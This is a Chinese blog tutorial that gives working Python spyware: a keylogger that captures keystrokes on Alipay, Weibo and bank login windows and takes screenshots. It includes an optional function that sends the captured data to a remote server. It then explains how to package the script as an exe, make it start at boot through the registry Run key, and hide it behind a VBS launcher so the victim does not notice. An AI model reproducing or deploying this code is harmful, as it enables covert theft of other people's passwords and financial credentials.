本文以一段简单的监听鼠标、键盘事件的程序，实现获取用户的输入（比如登录某些网站的账号、密码）的功能。经测试，对于一台“裸奔”的电脑，完全能获取到用户输入的任何信息；但是如果安装了杀毒软件，就够呛了。具体实现方法如下：

一、代码部分：获取用户输入信息，并与截图一起保存到XX目录下

code：

[python] view plain copy

 

 print?

1. # -*- coding: utf-8 -*- #   
2.    
3. import pythoncom   
4. import pyHook    
5. import time  
6. import socket  
7. from PIL import ImageGrab  
8.    
9. #  
10. #如果是远程监听某个目标电脑，可以自己架设一个服务器，然后将获取到的信息发回给服务器  
11. #  
12. def send_msg_to_server(msg):  
13.   host=""  
14.   port=1234  
15.   buf_size=1024  
16.   addr=(host,port)  
17.   if len(msg)>0:  
18.     tcp_client_sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
19.     tcp_client_sock.connect(addr)  
20.     info=time.strftime(‘%Y%m%d%H%M%S‘,time.localtime(time.time()))+‘ from ‘+socket.gethostname()+‘:‘  
21.     tcp_client_sock.sendall(info+msg)  
22.     tcp_client_sock.close()  
23.        
24. #  
25. #也可以将获取到的信息保存到本地文件下  
26. #  
27. def write_msg_to_txt(msg):    
28.   f=open(‘D:/workspace/mytest/pyhook/media/monitor.txt‘,‘a‘)  
29.   f.write(msg+‘\r\n‘)  
30.   f.close()  
31.    
32. def onMouseEvent(event):   
33.   # 监听鼠标事件     
34.   global MSG  
35.   if len(MSG)!=0:      
36.     #send_msg_to_server(MSG)  
37.     write_msg_to_txt(MSG)  
38.     MSG=‘‘  
39.     pic_name = time.strftime(‘%Y%m%d%H%M%S‘,time.localtime(time.time()))  
40.     #将用户屏幕截图，保存到本地某个目录下（也可以搞成远程发送到自己的服务器）  
41.     pic = ImageGrab.grab()  
42.     pic.save(‘D:/workspace/mytest/pyhook/media/mouse_%s.png‘ % pic_name)  
43.   return True  
44.     
45. def onKeyboardEvent(event):  
46.   #监听键盘事件  
47.   global MSG  
48.   title= event.WindowName.decode(‘GBK‘)  
49.   #通过网站title，判断当前网站是否是“监听目标”  
50.   if title.find(u"支付宝") != -1 or title.find(u‘新浪微博‘)!=-1 or title.find(u‘浦发银行‘)!=-1:  
51.     #Ascii: 8-Backspace , 9-Tab ,13-Enter   
52.     if (127 >= event.Ascii > 31) or (event.Ascii == 8):  
53.       MSG += chr(event.Ascii)          
54.     if (event.Ascii == 9) or (event.Ascii == 13):        
55.       #send_msg_to_remote(MSG)  
56.       write_msg_to_txt(MSG)  
57.       MSG = ‘‘   
58.       #屏幕抓图实现  
59.       pic_name = time.strftime(‘%Y%m%d%H%M%S‘,time.localtime(time.time()))  
60.       pic = ImageGrab.grab()  
61.       #保存成为以日期命名的图片  
62.       pic.save(‘D:/workspace/mytest/pyhook/media/keyboard_%s.png‘ % pic_name)  
63.   return True  
64.     
65. if __name__ == "__main__":     
66.   MSG = ‘‘    
67.   #创建hook句柄  
68.   hm = pyHook.HookManager()  
69.    
70.   #监控鼠标  
71.   hm.SubscribeMouseLeftDown(onMouseEvent)  
72.   hm.HookMouse()  
73.    
74.   #监控键盘  
75.   hm.KeyDown = onKeyboardEvent  
76.   hm.HookKeyboard()  
77.    
78.   #循环获取消息  
79.   pythoncom.PumpMessages()   

二、用py2exe将脚本打包：

新建一个py文件setup.py，内容如下：

[python] view plain copy

 

 print?

1. from distutils.core import setup  
2. import py2exe  
3. setup(console=["monitor.py"])  
4. #setup(windows=["monitor.py"])  

命令行执行以下命令：

三、将该程序设置为开机自动启动：

步骤①：

将需要开机启动的文件（创建一个快捷方式，然后）放到“开始/所有程序/启动”目录下

步骤②：

修改注册表：命令行— regedit ，然后到以下路径下：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]  

新建一个“字符串值”，然后编辑：设置exe文件所在路径
D:\workspace\mytest\pyhook\dist\monitor.exe

（以上两种方式启动monitor.exe的话，会弹出一个命令框，显示监听日志信息，这样的话，被监听的人一下就能发现了，可以试试下面这个方式）

步骤③：

新建一个 .vbs文件，内容如下：

双击运行该vbs文件，则monitor.exe就在后台启动了（不会弹出一个大黑框）。
然后参考法①、② 把该vbs设置成开机启动即可。